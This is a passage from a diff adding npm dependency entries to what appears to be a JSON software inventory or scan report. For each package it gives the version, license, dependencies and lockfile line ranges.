+ { + "ID": "@tootallnate/once@1.1.2", + "Name": "@tootallnate/once", + "Identifier": { + "PURL": "pkg:npm/%40tootallnate/once@1.1.2", + "UID": "31254e5ee78ef763" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5268, + "EndLine": 5277 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@trysound/sax@0.2.0", + "Name": "@trysound/sax", + "Identifier": { + "PURL": "pkg:npm/%40trysound/sax@0.2.0", + "UID": "e778ed1e63892fbe" + }, + "Version": "0.2.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5278, + "EndLine": 5286 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@tufjs/canonical-json@2.0.0", + "Name": "@tufjs/canonical-json", + "Identifier": { + "PURL": "pkg:npm/%40tufjs/canonical-json@2.0.0", + "UID": "7b47731df5314ce2" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13954, + "EndLine": 13963 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@tufjs/models@4.0.0", + "Name": "@tufjs/models", + "Identifier": { + "PURL": "pkg:npm/%40tufjs/models@4.0.0", + "UID": "5ec4d7f20e3dda73" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@tufjs/canonical-json@2.0.0", + "minimatch@9.0.5" + ], + "Locations": [ + { + "StartLine": 13964, + "EndLine": 13975 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/babel__core@7.20.5", + "Name": "@types/babel__core", + "Identifier": { + "PURL": "pkg:npm/%40types/babel__core@7.20.5", + "UID": "fde6e3c43582f638" + }, + "Version": "7.20.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/parser@7.28.4", + "@babel/types@7.28.4", + "@types/babel__generator@7.27.0", + "@types/babel__template@7.4.4", + "@types/babel__traverse@7.28.0" + ], + "Locations": [ + { + "StartLine": 5287, + "EndLine": 5299 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/babel__generator@7.27.0", + "Name": "@types/babel__generator", + "Identifier": { + "PURL": "pkg:npm/%40types/babel__generator@7.27.0", + "UID": "9efa0a6746da26b9" + }, + "Version": "7.27.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 5300, + "EndLine": 5308 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/babel__template@7.4.4", + "Name": "@types/babel__template", + "Identifier": { + "PURL": "pkg:npm/%40types/babel__template@7.4.4", + "UID": "672a87a46045d266" + }, + "Version": "7.4.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/parser@7.28.4", + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 5309, + "EndLine": 5318 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/babel__traverse@7.28.0", + "Name": "@types/babel__traverse", + "Identifier": { + "PURL": "pkg:npm/%40types/babel__traverse@7.28.0", + "UID": "c84a63e763aceb5a" + }, + "Version": "7.28.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 5319, + "EndLine": 5327 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/geojson@7946.0.16", + "Name": "@types/geojson", + "Identifier": { + "PURL": "pkg:npm/%40types/geojson@7946.0.16", + "UID": "b63a2ed2b4df88d5" + }, + "Version": "7946.0.16", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5328, + "EndLine": 5333 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/graceful-fs@4.1.9", + "Name": "@types/graceful-fs", + "Identifier": { + "PURL": "pkg:npm/%40types/graceful-fs@4.1.9", + "UID": "10b0d82f2f946f2b" + }, + "Version": "4.1.9", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/node@24.7.0" + ], + "Locations": [ + { + "StartLine": 5334, + "EndLine": 5342 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/hammerjs@2.0.46", + "Name": "@types/hammerjs", + "Identifier": { + "PURL": "pkg:npm/%40types/hammerjs@2.0.46", + "UID": "308ef62972cca38f" + }, + "Version": "2.0.46", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5343, + "EndLine": 5348 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/istanbul-lib-coverage@2.0.6", + "Name": "@types/istanbul-lib-coverage", + "Identifier": { + "PURL": "pkg:npm/%40types/istanbul-lib-coverage@2.0.6", + "UID": "bf022a080e3782e9" + }, + "Version": "2.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5349, + "EndLine": 5354 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/istanbul-lib-report@3.0.3", + "Name": "@types/istanbul-lib-report", + "Identifier": { + "PURL": "pkg:npm/%40types/istanbul-lib-report@3.0.3", + "UID": "fd8ceae2a9f4b873" + }, + "Version": "3.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/istanbul-lib-coverage@2.0.6" + ], + "Locations": [ + { + "StartLine": 5355, + "EndLine": 5363 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/istanbul-reports@3.0.4", + "Name": "@types/istanbul-reports", + "Identifier": { + "PURL": "pkg:npm/%40types/istanbul-reports@3.0.4", + "UID": "faa519dd943aba8c" + }, + "Version": "3.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/istanbul-lib-report@3.0.3" + ], + "Locations": [ + { + "StartLine": 5364, + "EndLine": 5372 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/minimist@1.2.5", + "Name": "@types/minimist", + "Identifier": { + "PURL": "pkg:npm/%40types/minimist@1.2.5", + "UID": "c9587108e2c34717" + }, + "Version": "1.2.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5391, + "EndLine": 5396 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/node@24.7.0", + "Name": "@types/node", + "Identifier": { + "PURL": "pkg:npm/%40types/node@24.7.0", + "UID": "9243479173e7c45" + }, + "Version": "24.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "undici-types@7.14.0" + ], + "Locations": [ + { + "StartLine": 5397, + "EndLine": 5405 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/normalize-package-data@2.4.4", + "Name": "@types/normalize-package-data", + "Identifier": { + "PURL": "pkg:npm/%40types/normalize-package-data@2.4.4", + "UID": "ada19cd28471c693" + }, + "Version": "2.4.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5406, + "EndLine": 5411 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/stack-utils@2.0.3", + "Name": "@types/stack-utils", + "Identifier": { + "PURL": "pkg:npm/%40types/stack-utils@2.0.3", + "UID": "4804de726f12876b" + }, + "Version": "2.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5473, + "EndLine": 5478 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/use-sync-external-store@0.0.6", + "Name": "@types/use-sync-external-store", + "Identifier": { + "PURL": "pkg:npm/%40types/use-sync-external-store@0.0.6", + "UID": "93bae9a67858c284" + }, + "Version": "0.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5479, + "EndLine": 5484 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/yargs@17.0.33", + "Name": "@types/yargs", + "Identifier": { + "PURL": "pkg:npm/%40types/yargs@17.0.33", + "UID": "4399d0ddd011cdbd" + }, + "Version": "17.0.33", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/yargs-parser@21.0.3" + ], + "Locations": [ + { + "StartLine": 5485, + "EndLine": 5493 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@types/yargs-parser@21.0.3", + "Name": "@types/yargs-parser", + "Identifier": { + "PURL": "pkg:npm/%40types/yargs-parser@21.0.3", + "UID": "666142b1c921aa5b" + }, + "Version": "21.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5494, + "EndLine": 5499 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@vscode/sudo-prompt@9.3.1", + "Name": "@vscode/sudo-prompt", + "Identifier": { + "PURL": "pkg:npm/%40vscode/sudo-prompt@9.3.1", + "UID": "ec5f560718bcdb9f" + }, + "Version": "9.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5726, + "EndLine": 5731 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@xmldom/xmldom@0.8.11", + "Name": "@xmldom/xmldom", + "Identifier": { + "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", + "UID": "f9e98e014475aea3" + }, + "Version": "0.8.11", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5732, + "EndLine": 5740 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "abbrev@1.1.1", + "Name": "abbrev", + "Identifier": { + "PURL": "pkg:npm/abbrev@1.1.1", + "UID": "5c25c4bc283341b6" + }, + "Version": "1.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5748, + "EndLine": 5754 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "abbrev@3.0.1", + "Name": "abbrev", + "Identifier": { + "PURL": "pkg:npm/abbrev@3.0.1", + "UID": "583427a942cc5e78" + }, + "Version": "3.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13990, + "EndLine": 13997 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "abort-controller@3.0.0", + "Name": "abort-controller", + "Identifier": { + "PURL": "pkg:npm/abort-controller@3.0.0", + "UID": "182f694f6f8df4df" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "event-target-shim@5.0.1" + ], + "Locations": [ + { + "StartLine": 5755, + "EndLine": 5766 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "accepts@1.3.8", + "Name": "accepts", + "Identifier": { + "PURL": "pkg:npm/accepts@1.3.8", + "UID": "ec798bcefa1240f6" + }, + "Version": "1.3.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mime-types@2.1.35", + "negotiator@0.6.3" + ], + "Locations": [ + { + "StartLine": 5767, + "EndLine": 5779 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "acorn@8.15.0", + "Name": "acorn", + "Identifier": { + "PURL": "pkg:npm/acorn@8.15.0", + "UID": "45c162e91acd0969" + }, + "Version": "8.15.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5789, + "EndLine": 5800 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "agent-base@6.0.2", + "Name": "agent-base", + "Identifier": { + "PURL": "pkg:npm/agent-base@6.0.2", + "UID": "eae3416ea985a0c0" + }, + "Version": "6.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 10115, + "EndLine": 10127 + }, + { + "StartLine": 12161, + "EndLine": 12173 + }, + { + "StartLine": 19813, + "EndLine": 19825 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "agent-base@7.1.4", + "Name": "agent-base", + "Identifier": { + "PURL": "pkg:npm/agent-base@7.1.4", + "UID": "9b9b56f4add045c9" + }, + "Version": "7.1.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5811, + "EndLine": 5819 + }, + { + "StartLine": 13998, + "EndLine": 14007 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "agentkeepalive@4.6.0", + "Name": "agentkeepalive", + "Identifier": { + "PURL": "pkg:npm/agentkeepalive@4.6.0", + "UID": "d7234690f893e99" + }, + "Version": "4.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "humanize-ms@1.2.1" + ], + "Locations": [ + { + "StartLine": 5820, + "EndLine": 5832 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "aggregate-error@3.1.0", + "Name": "aggregate-error", + "Identifier": { + "PURL": "pkg:npm/aggregate-error@3.1.0", + "UID": "9750f23bf4bfcf9b" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "clean-stack@2.2.0", + "indent-string@4.0.0" + ], + "Locations": [ + { + "StartLine": 5833, + "EndLine": 5846 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "anser@1.4.10", + "Name": "anser", + "Identifier": { + "PURL": "pkg:npm/anser@1.4.10", + "UID": "dabf39994dfb4833" + }, + "Version": "1.4.10", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5864, + "EndLine": 5869 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ansi-fragments@0.2.1", + "Name": "ansi-fragments", + "Identifier": { + "PURL": "pkg:npm/ansi-fragments@0.2.1", + "UID": "a6d4368738c84355" + }, + "Version": "0.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "colorette@1.4.0", + "slice-ansi@2.1.0", + "strip-ansi@5.2.0" + ], + "Locations": [ + { + "StartLine": 5899, + "EndLine": 5910 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ansi-regex@2.1.1", + "Name": "ansi-regex", + "Identifier": { + "PURL": "pkg:npm/ansi-regex@2.1.1", + "UID": "9f8f87fb128e8e2b" + }, + "Version": "2.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 17311, + "EndLine": 17319 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ansi-regex@4.1.1", + "Name": "ansi-regex", + "Identifier": { + "PURL": "pkg:npm/ansi-regex@4.1.1", + "UID": "669364d772672ba7" + }, + "Version": "4.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5911, + "EndLine": 5920 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ansi-regex@5.0.1", + "Name": "ansi-regex", + "Identifier": { + "PURL": "pkg:npm/ansi-regex@5.0.1", + "UID": "c14e7d7c1381d06f" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5934, + "EndLine": 5942 + }, + { + "StartLine": 14008, + "EndLine": 14017 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ansi-regex@6.2.2", + "Name": "ansi-regex", + "Identifier": { + "PURL": "pkg:npm/ansi-regex@6.2.2", + "UID": "b45a5f32384c5c21" + }, + "Version": "6.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3328, + "EndLine": 3339 + }, + { + "StartLine": 13566, + "EndLine": 13578 + }, + { + "StartLine": 15918, + "EndLine": 15930 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ansi-styles@3.2.1", + "Name": "ansi-styles", + "Identifier": { + "PURL": "pkg:npm/ansi-styles@3.2.1", + "UID": "7801c6df16feeae8" + }, + "Version": "3.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-convert@1.9.3" + ], + "Locations": [ + { + "StartLine": 498, + "EndLine": 509 + }, + { + "StartLine": 19717, + "EndLine": 19729 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ansi-styles@4.3.0", + "Name": "ansi-styles", + "Identifier": { + "PURL": "pkg:npm/ansi-styles@4.3.0", + "UID": "b0fe9d2fcc8265a1" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-convert@2.0.1" + ], + "Locations": [ + { + "StartLine": 5943, + "EndLine": 5957 + }, + { + "StartLine": 15904, + "EndLine": 15917 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ansi-styles@5.2.0", + "Name": "ansi-styles", + "Identifier": { + "PURL": "pkg:npm/ansi-styles@5.2.0", + "UID": "847b998ea56ed0c8" + }, + "Version": "5.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16882, + "EndLine": 16893 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ansi-styles@6.2.3", + "Name": "ansi-styles", + "Identifier": { + "PURL": "pkg:npm/ansi-styles@6.2.3", + "UID": "8e020ebbe998c200" + }, + "Version": "6.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3340, + "EndLine": 3351 + }, + { + "StartLine": 14018, + "EndLine": 14030 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "anymatch@3.1.3", + "Name": "anymatch", + "Identifier": { + "PURL": "pkg:npm/anymatch@3.1.3", + "UID": "a55093e147f193fb" + }, + "Version": "3.1.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "normalize-path@3.0.0", + "picomatch@2.3.1" + ], + "Locations": [ + { + "StartLine": 5958, + "EndLine": 5970 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "appdirsjs@1.2.7", + "Name": "appdirsjs", + "Identifier": { + "PURL": "pkg:npm/appdirsjs@1.2.7", + "UID": "f9c511d8970b3391" + }, + "Version": "1.2.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5971, + "EndLine": 5976 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "aproba@1.2.0", + "Name": "aproba", + "Identifier": { + "PURL": "pkg:npm/aproba@1.2.0", + "UID": "8c07f2fb05d4df25" + }, + "Version": "1.2.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5977, + "EndLine": 5982 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "aproba@2.1.0", + "Name": "aproba", + "Identifier": { + "PURL": "pkg:npm/aproba@2.1.0", + "UID": "3ecd1bda85a52f73" + }, + "Version": "2.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14031, + "EndLine": 14037 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "archy@1.0.0", + "Name": "archy", + "Identifier": { + "PURL": "pkg:npm/archy@1.0.0", + "UID": "7884e64c8797969d" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14038, + "EndLine": 14044 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "are-we-there-yet@1.1.7", + "Name": "are-we-there-yet", + "Identifier": { + "PURL": "pkg:npm/are-we-there-yet@1.1.7", + "UID": "40af8b7e0f474192" + }, + "Version": "1.1.7", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "delegates@1.0.0", + "readable-stream@2.3.8" + ], + "Locations": [ + { + "StartLine": 17320, + "EndLine": 17330 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "are-we-there-yet@3.0.1", + "Name": "are-we-there-yet", + "Identifier": { + "PURL": "pkg:npm/are-we-there-yet@3.0.1", + "UID": "21e275639adfa4f" + }, + "Version": "3.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "delegates@1.0.0", + "readable-stream@3.6.2" + ], + "Locations": [ + { + "StartLine": 5983, + "EndLine": 5997 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "argparse@1.0.10", + "Name": "argparse", + "Identifier": { + "PURL": "pkg:npm/argparse@1.0.10", + "UID": "e23ac00b6dbad7a" + }, + "Version": "1.0.10", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "sprintf-js@1.0.3" + ], + "Locations": [ + { + "StartLine": 3432, + "EndLine": 3440 + }, + { + "StartLine": 12258, + "EndLine": 12266 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "argparse@2.0.1", + "Name": "argparse", + "Identifier": { + "PURL": "pkg:npm/argparse@2.0.1", + "UID": "823f389926343f7b" + }, + "Version": "2.0.1", + "Licenses": [ + "Python-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5998, + "EndLine": 6003 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "argsarray@0.0.1", + "Name": "argsarray", + "Identifier": { + "PURL": "pkg:npm/argsarray@0.0.1", + "UID": "801ad07d74a9d000" + }, + "Version": "0.0.1", + "Licenses": [ + "WTFPL" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6004, + "EndLine": 6009 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "arrify@1.0.1", + "Name": "arrify", + "Identifier": { + "PURL": "pkg:npm/arrify@1.0.1", + "UID": "c96591ffef9131e2" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6158, + "EndLine": 6166 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "asap@2.0.6", + "Name": "asap", + "Identifier": { + "PURL": "pkg:npm/asap@2.0.6", + "UID": "2dfc49e2aaea3bec" + }, + "Version": "2.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6167, + "EndLine": 6172 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "astral-regex@1.0.0", + "Name": "astral-regex", + "Identifier": { + "PURL": "pkg:npm/astral-regex@1.0.0", + "UID": "30df7ba750c3e196" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6173, + "EndLine": 6182 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "async-limiter@1.0.1", + "Name": "async-limiter", + "Identifier": { + "PURL": "pkg:npm/async-limiter@1.0.1", + "UID": "695cd8aee920fd42" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6193, + "EndLine": 6198 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "asynckit@0.4.0", + "Name": "asynckit", + "Identifier": { + "PURL": "pkg:npm/asynckit@0.4.0", + "UID": "2a7117da72815edf" + }, + "Version": "0.4.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6199, + "EndLine": 6204 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "available-typed-arrays@1.0.7", + "Name": "available-typed-arrays", + "Identifier": { + "PURL": "pkg:npm/available-typed-arrays@1.0.7", + "UID": "10610d8dacec4e1e" + }, + "Version": "1.0.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "possible-typed-array-names@1.1.0" + ], + "Locations": [ + { + "StartLine": 6205, + "EndLine": 6219 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "b4a@1.7.3", + "Name": "b4a", + "Identifier": { + "PURL": "pkg:npm/b4a@1.7.3", + "UID": "eccf7490462e9b90" + }, + "Version": "1.7.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6231, + "EndLine": 6244 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "babel-jest@29.7.0", + "Name": "babel-jest", + "Identifier": { + "PURL": "pkg:npm/babel-jest@29.7.0", + "UID": "54170d61edb89808" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@jest/transform@29.7.0", + "@types/babel__core@7.20.5", + "babel-plugin-istanbul@6.1.1", + "babel-preset-jest@29.6.3", + "chalk@4.1.2", + "graceful-fs@4.2.11", + "slash@3.0.0" + ], + "Locations": [ + { + "StartLine": 6245, + "EndLine": 6265 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "babel-plugin-istanbul@6.1.1", + "Name": "babel-plugin-istanbul", + "Identifier": { + "PURL": "pkg:npm/babel-plugin-istanbul@6.1.1", + "UID": "b28916b2b958925d" + }, + "Version": "6.1.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1", + "@istanbuljs/load-nyc-config@1.1.0", + "@istanbuljs/schema@0.1.3", + "istanbul-lib-instrument@5.2.1", + "test-exclude@6.0.0" + ], + "Locations": [ + { + "StartLine": 6275, + "EndLine": 6290 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "babel-plugin-jest-hoist@29.6.3", + "Name": "babel-plugin-jest-hoist", + "Identifier": { + "PURL": "pkg:npm/babel-plugin-jest-hoist@29.6.3", + "UID": "72d961287fa9ce28" + }, + "Version": "29.6.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/template@7.27.2", + "@babel/types@7.28.4", + "@types/babel__core@7.20.5", + "@types/babel__traverse@7.28.0" + ], + "Locations": [ + { + "StartLine": 6307, + "EndLine": 6321 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "babel-plugin-polyfill-corejs2@0.4.14", + "Name": "babel-plugin-polyfill-corejs2", + "Identifier": { + "PURL": "pkg:npm/babel-plugin-polyfill-corejs2@0.4.14", + "UID": "48a29fa80e39fc36" + }, + "Version": "0.4.14", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/compat-data@7.28.4", + "@babel/core@7.28.4", + "@babel/helper-define-polyfill-provider@0.6.5", + "semver@6.3.1" + ], + "Locations": [ + { + "StartLine": 6378, + "EndLine": 6391 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "babel-plugin-polyfill-corejs3@0.13.0", + "Name": "babel-plugin-polyfill-corejs3", + "Identifier": { + "PURL": "pkg:npm/babel-plugin-polyfill-corejs3@0.13.0", + "UID": "56f3bacf92c8e753" + }, + "Version": "0.13.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-define-polyfill-provider@0.6.5", + "core-js-compat@3.45.1" + ], + "Locations": [ + { + "StartLine": 6392, + "EndLine": 6404 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "babel-plugin-polyfill-regenerator@0.6.5", + "Name": "babel-plugin-polyfill-regenerator", + "Identifier": { + "PURL": "pkg:npm/babel-plugin-polyfill-regenerator@0.6.5", + "UID": "531bf4d83fc78c9c" + }, + "Version": "0.6.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-define-polyfill-provider@0.6.5" + ], + "Locations": [ + { + "StartLine": 6405, + "EndLine": 6416 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "babel-plugin-syntax-hermes-parser@0.29.1", + "Name": "babel-plugin-syntax-hermes-parser", + "Identifier": { + "PURL": "pkg:npm/babel-plugin-syntax-hermes-parser@0.29.1", + "UID": "3142bba799d0ae27" + }, + "Version": "0.29.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "hermes-parser@0.29.1" + ], + "Locations": [ + { + "StartLine": 6417, + "EndLine": 6425 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "babel-plugin-transform-flow-enums@0.0.2", + "Name": "babel-plugin-transform-flow-enums", + "Identifier": { + "PURL": "pkg:npm/babel-plugin-transform-flow-enums@0.0.2", + "UID": "59002848b8530a21" + }, + "Version": "0.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/plugin-syntax-flow@7.27.1" + ], + "Locations": [ + { + 